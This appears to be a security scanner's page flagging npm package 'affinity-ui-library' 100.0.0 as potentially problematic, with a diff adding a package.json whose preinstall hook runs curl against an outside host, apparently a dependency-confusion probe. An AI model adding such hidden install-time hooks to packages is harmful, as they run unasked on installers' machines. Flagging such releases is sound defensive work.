affinity-ui-library 100.0.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of affinity-ui-library might be problematic. Click here for more details.
- package/index.js +3 -0
- package/package.json +15 -0
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
{
|
2
|
+
"name": "affinity-ui-library",
|
3
|
+
"version": "100.0.0",
|
4
|
+
"description": "Synack0x1",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" ",
|
8
|
+
"preinstall": "curl http://w2rehw10.x1.pe/poc.html"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"Synack"
|
12
|
+
],
|
13
|
+
"author": "Synack",
|
14
|
+
"license": "ISC"
|
15
|
+
}
|